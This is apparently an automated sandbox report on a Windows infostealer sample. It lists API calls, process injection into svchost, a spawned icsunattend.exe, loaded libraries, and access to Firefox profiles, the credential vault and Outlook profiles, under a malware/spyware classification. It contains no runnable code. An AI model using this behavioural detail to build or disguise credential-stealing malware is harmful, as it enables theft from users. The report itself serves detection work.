                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72CA0 NtQueryInformationToken,2_2_02D72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72C60 NtCreateKey,2_2_02D72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72C00 NtQueryInformationProcess,2_2_02D72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72DD0 NtDelayExecution,2_2_02D72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72DB0 NtEnumerateKey,2_2_02D72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72D10 NtMapViewOfSection,2_2_02D72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72D00 NtSetInformationFile,2_2_02D72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72D30 NtUnmapViewOfSection,2_2_02D72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D73090 NtSetValueKey,2_2_02D73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D73010 NtOpenDirectoryObject,2_2_02D73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D739B0 NtGetContextThread,2_2_02D739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D73D70 NtOpenThread,2_2_02D73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D73D10 NtOpenProcessToken,2_2_02D73D10
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E86685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00E86685
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E7ACC5
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E879D3
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E6B0430_2_00E6B043
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E532000_2_00E53200
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E53B700_2_00E53B70
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7410F0_2_00E7410F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E602A40_2_00E602A4
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E4E3B00_2_00E4E3B0
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7038E0_2_00E7038E
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E606D90_2_00E606D9
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7467F0_2_00E7467F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00EAAACE0_2_00EAAACE
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E74BEF0_2_00E74BEF
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E6CCC10_2_00E6CCC1
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E4AF500_2_00E4AF50
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E46F070_2_00E46F07
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00EA31BC0_2_00EA31BC
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E6D1B90_2_00E6D1B9
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5B11F0_2_00E5B11F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7724D0_2_00E7724D
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E6123A0_2_00E6123A
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E493F00_2_00E493F0
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E813CA0_2_00E813CA
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5F5630_2_00E5F563
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8B6CC0_2_00E8B6CC
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E496C00_2_00E496C0
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00EAF7FF0_2_00EAF7FF
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E477B00_2_00E477B0
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E779C90_2_00E779C9
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5FA570_2_00E5FA57
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E49B600_2_00E49B60
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E47D190_2_00E47D19
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E69ED00_2_00E69ED0
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5FE6F0_2_00E5FE6F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E47FA30_2_00E47FA3
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00BC4A200_2_00BC4A20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021587932_2_02158793
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02142AD02_2_02142AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0214E2D82_2_0214E2D8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0214E2E32_2_0214E2E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021569952_2_02156995
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021569932_2_02156993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0214E1932_2_0214E193
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021501B32_2_021501B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021411F02_2_021411F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021426B02_2_021426B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0216EF432_2_0216EF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0214FF932_2_0214FF93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0214FF8C2_2_0214FF8C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02142FE02_2_02142FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC02C02_2_02DC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE02742_2_02DE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E003E62_2_02E003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E3F02_2_02D4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFA3522_2_02DFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD20002_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF81CC2_2_02DF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E001AA2_2_02E001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC81582_2_02DC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA1182_2_02DDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D301002_2_02D30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5C6E02_2_02D5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3C7C02_2_02D3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D647502_2_02D64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D407702_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEE4F62_2_02DEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF24462_2_02DF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE44202_2_02DE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E005912_2_02E00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D405352_2_02D40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA802_2_02D3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF6BD72_2_02DF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFAB402_2_02DFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E8F02_2_02D6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D268B82_2_02D268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4A8402_2_02D4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D428402_2_02D42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E0A9A62_2_02E0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A02_2_02D429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D569622_2_02D56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFEEDB2_2_02DFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D52E902_2_02D52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFCE932_2_02DFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40E592_2_02D40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFEE262_2_02DFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D32FC82_2_02D32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4CFE02_2_02D4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBEFA02_2_02DBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB4F402_2_02DB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60F302_2_02D60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE2F302_2_02DE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D82F282_2_02D82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30CF22_2_02D30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0CB52_2_02DE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40C002_2_02D40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3ADE02_2_02D3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D58DBF2_2_02D58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDCD1F2_2_02DDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4AD002_2_02D4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5B2C02_2_02D5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE12ED2_2_02DE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D452A02_2_02D452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D8739A2_2_02D8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2D34C2_2_02D2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF132D2_2_02DF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEF0CC2_2_02DEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D470C02_2_02D470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF70E92_2_02DF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFF0E02_2_02DFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4B1B02_2_02D4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E0B16B2_2_02E0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2F1722_2_02D2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D7516C2_2_02D7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF16CC2_2_02DF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFF7B02_2_02DFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D314602_2_02D31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFF43F2_2_02DFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDD5B02_2_02DDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF75712_2_02DF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEDAC62_2_02DEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDDAAC2_2_02DDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D85AA02_2_02D85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE1AA32_2_02DE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFA492_2_02DFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF7A462_2_02DF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB3A6C2_2_02DB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB5BF02_2_02DB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D7DBF92_2_02D7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5FB802_2_02D5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFB762_2_02DFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D438E02_2_02D438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAD8002_2_02DAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D499502_2_02D49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5B9502_2_02D5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD59102_2_02DD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D49EB02_2_02D49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D41F922_2_02D41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFFB12_2_02DFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFF092_2_02DFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFCF22_2_02DFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB9C322_2_02DB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5FDC02_2_02D5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF1D5A2_2_02DF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D43D402_2_02D43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF7D732_2_02DF7D73
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4381A4_2_02D4381A
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4194A4_2_02D4194A
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4193F4_2_02D4193F
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D49FFC4_2_02D49FFC
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D49FFA4_2_02D49FFA
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D417BE4_2_02D417BE
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D4BDF54_2_02D4BDF5
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D435F34_2_02D435F3
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D435FA4_2_02D435FA
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeCode function: 4_2_02D625AA4_2_02D625AA
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: String function: 00E5EC2F appears 68 times
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: String function: 00E66AC0 appears 42 times
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: String function: 00E6F8A0 appears 35 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02DBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02DAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D87E54 appears 102 times
                Source: Fi#U015f.exe, 00000000.00000003.2079288125.0000000003543000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fi#U015f.exe
                Source: Fi#U015f.exe, 00000000.00000003.2079014660.00000000036ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fi#U015f.exe
                Source: Fi#U015f.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@8/3
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8CE7A GetLastError,FormatMessageW,0_2_00E8CE7A
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7AB84 AdjustTokenPrivileges,CloseHandle,0_2_00E7AB84
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E7B134
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E8E1FD
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E86532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00E86532
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E9C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00E9C18C
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E4406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E4406B
                Source: C:\Users\user\Desktop\Fi#U015f.exeFile created: C:\Users\user\AppData\Local\Temp\aut1A69.tmpJump to behavior
                Source: Fi#U015f.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: icsunattend.exe, 00000006.00000002.3302124025.0000000000712000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2734898666.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2737463825.000000000071B000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2734998514.0000000000712000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3302124025.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Fi#U015f.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\Fi#U015f.exe "C:\Users\user\Desktop\Fi#U015f.exe"
                Source: C:\Users\user\Desktop\Fi#U015f.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Fi#U015f.exe"
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Fi#U015f.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Fi#U015f.exe"Jump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Fi#U015f.exeStatic file information: File size 1209344 > 1048576
                Source: Fi#U015f.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Fi#U015f.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Fi#U015f.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Fi#U015f.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Fi#U015f.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Fi#U015f.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Fi#U015f.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hnmibsTvfR.exe, 00000004.00000000.2476250910.000000000075E000.00000002.00000001.01000000.00000005.sdmp, hnmibsTvfR.exe, 00000007.00000000.2625552123.000000000075E000.00000002.00000001.01000000.00000005.sdmp
